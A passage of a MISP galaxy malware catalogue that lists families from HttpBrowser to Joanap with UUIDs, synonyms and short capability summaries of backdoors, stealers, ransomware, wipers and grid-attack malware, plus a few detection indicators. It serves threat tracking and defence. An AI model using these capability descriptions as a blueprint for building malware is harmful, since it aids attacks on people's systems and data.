UUID 79f93d04-f6c8-4705-9395-7f575a61e82f which can be used as unique global reference for HttpBrowser in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

httpdropper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular httpdropper.

Known Synonyms
`httpdr0pper`

Internal MISP references

UUID 78336551-c18e-47ac-8bef-1c0c61c0e0a9 which can be used as unique global reference for httpdropper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HTTPSnoop

Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HTTPSnoop.

Known Synonyms
`TOFULOAD`

Internal MISP references

UUID f585fba9-4a75-4752-bfdd-a0049e4d8d63 which can be used as unique global reference for HTTPSnoop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HTTP(S) uploader

The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.

It accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port

Internal MISP references

UUID 50723d62-ecf2-49de-9ce2-911045ae63f0 which can be used as unique global reference for HTTP(S) uploader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

http_troy

Internal MISP references

UUID 339b3e7c-7a4a-4a1a-94b6-555f15a0b265 which can be used as unique global reference for http_troy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HUI Loader

A loader that has been used by multiple threat actor groups since 2015.

Internal MISP references

UUID 1cb6ed37-3017-45b9-b186-1e16d46a8dd2 which can be used as unique global reference for HUI Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hunter Stealer

Internal MISP references

UUID c93fdbb9-aafc-441d-a66f-aaf038f10bd3 which can be used as unique global reference for Hunter Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hupigon

Internal MISP references

UUID 40157734-eb33-4187-bcc8-2cd168db6fda which can be used as unique global reference for Hupigon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HuskLoader

Internal MISP references

UUID 06649edb-d078-4403-a628-6295d1bc4ad8 which can be used as unique global reference for HuskLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Hussar

Internal MISP references

UUID d3d86184-3c5c-478b-8f8b-f56f1a02247d which can be used as unique global reference for Hussar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HxDef

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HxDef.

Known Synonyms
`HacDef`
`HackDef`
`HackerDefender`

Internal MISP references

UUID 906adc27-757d-42bd-b8a2-f8a134077343 which can be used as unique global reference for HxDef in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HyperBro

HyperBro is a RAT that has been observed to target primarily within the gambling industries, though it has been spotted in other places as well. The malware typically consists of 3 or more components: a) a genuine loader typically with a signed certification b) a malicious DLL loader loaded from the former component via DLL hijacking c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within.

Internal MISP references

UUID b7f1abd3-870b-42ca-9bd1-5931126c68d5 which can be used as unique global reference for HyperBro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HYPERSCRAPE

Internal MISP references

UUID d532739b-327c-4c15-b272-e37e89183f0f which can be used as unique global reference for HYPERSCRAPE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HyperSSL (Windows)

Sideloader used by EmissaryPanda

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HyperSSL (Windows).

Known Synonyms
`FOCUSFJORD`
`Soldier`
`Sysupdate`

Internal MISP references

UUID 84f43641-77bc-4dcb-a104-150e8574da22 which can be used as unique global reference for HyperSSL (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HZ RAT (Windows)

Internal MISP references

UUID eaaebc38-73d8-48b7-9927-2d2523870795 which can be used as unique global reference for HZ RAT (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Icarus

Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.

Internal MISP references

UUID 8f1225ba-a636-488b-a288-ab777708a205 which can be used as unique global reference for Icarus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IcedID

According to Proofpoint, IcedID (aka BokBot) is a malware originally classified as a banking malware and was first observed in 2017. It also acts as a loader for other malware, including ransomware. The well-known IcedID version consists of an initial loader which contacts a Loader C2 server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot. IcedID is developed and operated by the actor named LUNAR SPIDER.

As previously published, historically there has been just one version of IcedID that has remained constant since 2017. * In November 2022, Proofpoint researchers observed the first new variant of IcedID Proofpoint dubbed 'IcedID Lite' distributed as a follow-on payload in a TA542 Emotet campaign. It was dropped by the Emotet malware soon after the actor returned to the e-crime landscape after a nearly four-month break. * The IcedID Lite Loader observed in November 2022 contains a static URL to download a 'Bot Pack' file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud. * Starting in February 2023, Proofpoint observed the new Forked variant of IcedID. This variant was distributed by TA581 and one unattributed threat activity cluster which acted as initial access facilitators. The campaigns used a variety of email attachments such as Microsoft OneNote attachments and somewhat rare to see .URL attachments, which led to the Forked variant of IcedID.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IcedID.

Known Synonyms
`BokBot`
`IceID`

Internal MISP references

UUID 26f5afaf-0bd7-4741-91ab-917bdd837330 which can be used as unique global reference for IcedID in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IcedID Downloader

Internal MISP references

UUID c3be9189-f8f2-45e4-b6a3-8960fd5ffc16 which can be used as unique global reference for IcedID Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Icefog

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Icefog.

Known Synonyms
`Fucobha`

Internal MISP references

UUID 48cdcbcf-38a8-4c68-a85e-42989ca28861 which can be used as unique global reference for Icefog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.icexloader

IceXLoader is a commercial malware used to download and deploy additional malware on infected machines. The latest version is written in Nim, a relatively new language utilized by threat actors the past two years, most notably by the NimzaLoader variant of BazarLoader used by the TrickBot group.

The v1 was written in AutoIT.

Internal MISP references

UUID eb1b3335-9002-49ad-b917-fcc188556d49 which can be used as unique global reference for win.icexloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IceCache

According to nao_sec, this malware is an IIS backdoor.

Internal MISP references

UUID d82b5e51-9785-40cd-b4f5-e47a6eb1bfaa which can be used as unique global reference for IceCache in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IceEvent

According to nao_sec, this malware is a simple passive-mode backdoor that is installed as a service.

Internal MISP references

UUID d5037590-7753-401e-8572-b7797dece3bb which can be used as unique global reference for IceEvent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ice IX

The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.

Internal MISP references

UUID 44a1706e-f6dc-43ea-ac85-9a4f2407b9a3 which can be used as unique global reference for Ice IX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IconDown

Internal MISP references

UUID 4f7ae3da-948c-4f74-8229-d5d7461f9c7d which can be used as unique global reference for IconDown in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IconicStealer

Follow-up payload in 3CX supply chain incident, which according to Volexity is an infostealer collecting information about the system and browser using an embedded copy of the SQLite3 library.

Internal MISP references

UUID 24fed92f-7e8f-449f-857f-d409d3bf8b48 which can be used as unique global reference for IconicStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IcyHeart

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IcyHeart.

Known Synonyms
`Troxen`

Internal MISP references

UUID bcc8b6ea-9295-4a22-a70d-422b1fd9814e which can be used as unique global reference for IcyHeart in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart - webarchive

Associated metadata

Metadata key	Value
type	[]

IDKEY

Internal MISP references

UUID 3afecded-3461-45f9-8159-e8328e56a916 which can be used as unique global reference for IDKEY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IISniff

Internal MISP references

UUID 3b746f77-214b-44f9-9ef2-0ae6b52561d6 which can be used as unique global reference for IISniff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IISpy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IISpy.

Known Synonyms
`BadIIS`

Internal MISP references

UUID 74afd7ae-8349-4186-9c85-82a45a2486c9 which can be used as unique global reference for IISpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IMAPLoader

Internal MISP references

UUID ffcd59c0-56d0-4693-9804-e46e5dcd21ce which can be used as unique global reference for IMAPLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Imecab

Internal MISP references

UUID 0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7 which can be used as unique global reference for Imecab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Imminent Monitor RAT

MITRE describes Imminent Monitor as a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.

Internal MISP references

UUID 53021414-97ad-4102-9cff-7a0e1997f867 which can be used as unique global reference for Imminent Monitor RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Immortal Stealer

ZScaler describes Immortal Stealer as a windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.

Internal MISP references

UUID 5f688e85-5f33-4ae6-880a-fc2e5146dd28 which can be used as unique global reference for Immortal Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ImprudentCook

ImprudentCook is an HTTP(S) downloader.

It was delivered in the Operation DreamJob type of activity targeting aerospace and defense companies in South Africa (in Q2 2022) and in Central Europe (in H1 2023), and against an unknown sector in South Korea back in Q2 2021.

It uses the AES cipher implemented through Windows Cryptographic Providers for decryption of its binary configuration, and also for encryption and decryption of the client-server communication.

It’s hidden in an ADS stream (:dat or :zone) of its dropper, together with its configuration (:rsrc) and an AES-128 CBC key with an initialization vector for its decryption (:kgb or :data).

It contains two characteristic arrays of strings that represent cookie names for web services, including Bing, Daum and GitHub:

iKc;uid;OAX;DMP_UID;PCID;_gid;_gat;csrftoken;NID;1P_JAR;JSESSIONID;WLS;SNID; utma;BID;SRCHD;GsCK_AC;spintop;eader;XSRF-TOKEN;gat_gtag_UA;webid enabled;EDGE_V;dtck_channel;dtmulti;UUID;XUID;ZIA;IUID;SSID;_gh_sess;_octo
channel;post_titles;xfw_exp;wiht_clkey;SGPCOUPLE;NRTK;fbp;uaid;SRCHUSR;GUC;HPVN;dtck_ blog;dtck_media;MUIDB;SRCHHPGUSR;SiteMain

It contains a string, "5.40" or "5.60", looking like version information.

Internal MISP references

UUID 76269425-73c2-4ce5-aab5-da744ad6bc1f which can be used as unique global reference for ImprudentCook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

INCONTROLLER

Internal MISP references

UUID 3ed3e880-1b93-4ca2-9e9d-0e429c4c895f which can be used as unique global reference for INCONTROLLER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Incubator

Keylogger written in Visual Basic dating back to at least 2012.

Internal MISP references

UUID b03201bd-8307-4c66-915e-d8f623084abe which can be used as unique global reference for Incubator in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IndigoDrop

Internal MISP references

UUID e98b19ce-82c3-472d-98d1-d81341af4267 which can be used as unique global reference for IndigoDrop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Industrial Spy

A ransomware that emerged in April 2022.

Internal MISP references

UUID 69fc6a53-3ef1-47e8-bcdb-e300d2a972a7 which can be used as unique global reference for Industrial Spy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Industroyer

Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Industroyer.

Known Synonyms
`Crash`
`CrashOverride`

Internal MISP references

UUID 610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6 which can be used as unique global reference for Industroyer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

INDUSTROYER2

Internal MISP references

UUID fa54359c-4a3f-45ea-a941-f2105aa27ef4 which can be used as unique global reference for INDUSTROYER2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Inferno

Internal MISP references

UUID 7638ac2e-0cdc-4101-8e3d-54b7b74a9c92 which can be used as unique global reference for Inferno in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

InfinityLock

InfinityLock ransomware is a type of malicious software that encrypts a victim's files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.

Internal MISP references

UUID 37fca614-e29a-4029-8afd-d3de61aa3ba0 which can be used as unique global reference for InfinityLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

InfoDot

Ransomware.

Internal MISP references

UUID e0ce5055-45cd-46d2-971f-bb3904ec43a1 which can be used as unique global reference for InfoDot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Infy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Infy.

Known Synonyms
`Foudre`

Internal MISP references

UUID 53616ce4-9b8e-45a0-b380-9e778cd95ae2 which can be used as unique global reference for Infy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Inlock

Internal MISP references

UUID 3071e2d4-c692-4054-a7bf-db9af6fe3b63 which can be used as unique global reference for Inlock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

InnaputRAT

InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.

Internal MISP references

UUID dd486e92-54fe-4306-9aab-05863cb6c6e1 which can be used as unique global reference for InnaputRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.innfirat

InnifiRAT is coded in .NET and targets personal data on infected devices, with it's top priority appearing to be bitcoin and litecoin wallet data.

InffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.

It attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality.

Internal MISP references

UUID b6aec7a7-7ebc-4aad-bcdf-1c3cb7044e3c which can be used as unique global reference for win.innfirat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Interception (Windows)

ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.

Internal MISP references

UUID fa022849-248c-4620-86b4-2a36c704b288 which can be used as unique global reference for Interception (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Invicta Stealer

According to Cyble, The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.

Internal MISP references

UUID 00a078bf-90db-4275-b7bd-0da757dd2284 which can be used as unique global reference for Invicta Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

InvisiMole

InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. The malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library. Malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.

The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.

The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.

Internal MISP references

UUID 22755fda-497e-4ef0-823e-5cb6d8701420 which can be used as unique global reference for InvisiMole in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IPStorm (Windows)

Internal MISP references

UUID c32661f5-8281-424e-9726-c5beb1ab2c5e which can be used as unique global reference for IPStorm (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ironcat

Internal MISP references

UUID c6fc8419-afb1-4e99-a6cf-4288ead2381b which can be used as unique global reference for Ironcat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IRONHALO

 IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.
 The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.

Internal MISP references

UUID 44599616-3849-4960-9379-05307287ff80 which can be used as unique global reference for IRONHALO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IronNetInjector

According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.

Internal MISP references

UUID 5ec639ab-f6c1-4cbb-87b1-d59344878e98 which can be used as unique global reference for IronNetInjector in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IronWind

Internal MISP references

UUID 91c94b56-68c6-4249-a718-e0dc00de8fce which can be used as unique global reference for IronWind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IsaacWiper

According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IsaacWiper.

Known Synonyms
`LASAINRAW`

Internal MISP references

UUID 6fb2d1bb-f8a4-4f73-9ea7-a4a9aae4f609 which can be used as unique global reference for IsaacWiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ISFB

2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

In September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.

The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.

There is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.

ISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.

In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.

See win.gozi for additional historical information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ISFB.

Known Synonyms
`Gozi ISFB`
`IAP`
`Pandemyia`

Internal MISP references

UUID a171321e-4968-4ac0-8497-3250c1f0d77d which can be used as unique global reference for ISFB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ISMAgent

Internal MISP references

UUID 67457708-1edd-4ef1-9ec0-1c5eb7c75fe2 which can be used as unique global reference for ISMAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ISMDoor

Internal MISP references

UUID e09d8dd6-6857-4607-a0ba-9c8d2a66083b which can be used as unique global reference for ISMDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

iSpy Keylogger

Internal MISP references

UUID 8c95cb51-1044-4dcd-9cac-ad9f2e3b9070 which can be used as unique global reference for iSpy Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IsraBye

Internal MISP references

UUID c5cec575-325c-44b8-af24-4feb330eec8a which can be used as unique global reference for IsraBye in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ISR Stealer

ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.

Incredibly, it uses an hard-coded user agent string: HardCore Software For : Public

Internal MISP references

UUID 27bab2fb-d324-42c2-9df3-669bb87c3989 which can be used as unique global reference for ISR Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IsSpace

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IsSpace.

Known Synonyms
`NfLog RAT`

Internal MISP references

UUID a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a which can be used as unique global reference for IsSpace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

IXWare

Internal MISP references

UUID 5710dffa-ec02-4e5c-848e-47af13f729d7 which can be used as unique global reference for IXWare in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jackal

According to Kaspersky Labs, this malware tool set has been used by APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia with espionage. It consists of multiple components and is written in .NET.

Internal MISP references

UUID 5f601f0a-13f7-40b5-9cf1-2eb50d5bad64 which can be used as unique global reference for Jackal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JackPOS

Internal MISP references

UUID 3acb37f4-5614-4932-b12f-9f1c256895f2 which can be used as unique global reference for JackPOS in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos - webarchive

Associated metadata

Metadata key	Value
type	[]

Jaff

Internal MISP references

UUID 2c51a717-726b-4813-9fcc-1265694b128e which can be used as unique global reference for Jaff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jager Decryptor

Internal MISP references

UUID 13a7a2ff-c945-4b42-a112-dcf09f9ed9c9 which can be used as unique global reference for Jager Decryptor in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor - webarchive

Associated metadata

Metadata key	Value
type	[]

Jaku

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jaku.

Known Synonyms
`C3PRO-RACOON`
`EQUINOX`
`KCNA Infostealer`
`Reconcyc`

Internal MISP references

UUID 0f02ea79-5833-46e0-8458-c4a863a5a112 which can be used as unique global reference for Jaku in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JanelaRAT

According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. Its focus is set on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat.

Internal MISP references

UUID d8455b0c-1d0b-4857-8e6a-abc6892cf7b9 which can be used as unique global reference for JanelaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Janeleiro

Internal MISP references

UUID 2ebce129-d59e-401c-9259-9009d9b2d50f which can be used as unique global reference for Janeleiro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

jason

Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.

Internal MISP references

UUID e101a605-c30f-4222-9549-4745d0d769cd which can be used as unique global reference for jason in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jasus

Internal MISP references

UUID af6e89ec-0adb-4ce6-b4e6-610827e722ea which can be used as unique global reference for Jasus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JCry

Ransomware written in Go.

Internal MISP references

UUID fea703ec-9b24-4119-96b3-7ae6bec3b203 which can be used as unique global reference for JCry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jeno

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jeno.

Known Synonyms
`Jest`
`Valeria`

Internal MISP references

UUID a1d7e117-4ca9-4d67-a4dd-53626827ed2f which can be used as unique global reference for Jeno in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JessieConTea

JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.

The malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.

JessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol ".?AVCHttpConn@@", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.

Internal MISP references

UUID 8f286f97-30c8-4281-887b-9cbede9f1e1e which can be used as unique global reference for JessieConTea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JhoneRAT

Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

Internal MISP references

UUID 6dd8c953-f500-46dd-bacf-78772222f011 which can be used as unique global reference for JhoneRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jigsaw

According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.

Internal MISP references

UUID 910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9 which can be used as unique global reference for Jigsaw in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Jimmy

Internal MISP references

UUID 551b568f-68fa-4483-a10c-a6452ae6289e which can be used as unique global reference for Jimmy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JinxLoader

Internal MISP references

UUID 76e3447a-124a-4eb1-8968-fbe0818b280a which can be used as unique global reference for JinxLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

JLORAT

Internal MISP references

UUID 8d3ed9af-c136-47a4-a0d2-50c8248435a4 which can be used as unique global reference for JLORAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Joanap

Internal MISP references

UUID bbbef449-2fe6-4c25-a85c-69af9fa6208b which can be used as unique global reference for Joanap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

